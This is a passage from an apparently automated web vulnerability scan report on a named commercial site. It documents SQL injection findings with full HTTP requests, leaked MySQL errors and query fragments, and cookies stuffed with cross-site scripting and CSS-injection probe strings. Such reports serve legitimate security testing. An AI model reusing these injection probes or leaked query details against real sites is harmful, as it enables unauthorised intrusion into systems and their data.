OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 06:22:32 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=9lcqk99rtfa76bg0isp23irf06; path=/
Content-Length: 127
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/deco00/project_dynamic_page_updated.php was not found on this server.</p>

1.235. http://www.insideup.com/ppc/leadflow/deco00/project_dynamic_page_updated.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/deco00/project_dynamic_page_updated.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/deco00/project_dynamic_page_updated.php?catId=30009&group=deco00&template=3&1'=1 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:29:02 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=etmhhoplhoeiteqs0hg6hmau14; path=/
Content-Length: 2518
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
/deco00/project_dynamic_page_updated.php?catId=30009&group=deco00&template=3&1'=1' OR prj.project_page_url = 'leadflow/deco00/project_dynamic_page_updated.php?catId=30009&group=deco00&template=3&1'=1/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/deco00/project_dynamic_page_updated.php?ca' at line 5

Request 2

GET /ppc/leadflow/deco00/project_dynamic_page_updated.php?catId=30009&group=deco00&template=3&1''=1 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:29:02 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=5pjsrh11qp7ru286hs4ci82b62; path=/
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8

Too many connections

1.236. http://www.insideup.com/ppc/leadflow/deco00/project_dynamic_page_updated.php [template parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/deco00/project_dynamic_page_updated.php

Issue detail

The template parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the template parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/deco00/project_dynamic_page_updated.php?catId=30009&group=deco00&template=3' HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:22:40 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=kbi0oern36nmjv2222iclloog5; path=/
Content-Length: 2486
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
leadflow/deco00/project_dynamic_page_updated.php?catId=30009&group=deco00&template=3'' OR prj.project_page_url = 'leadflow/deco00/project_dynamic_page_updated.php?catId=30009&group=deco00&template=3'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/deco00/project_dynamic_page_updated.php?catId=30009&group=deco00&templa' at line 5

Request 2

GET /ppc/leadflow/deco00/project_dynamic_page_updated.php?catId=30009&group=deco00&template=3'' HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 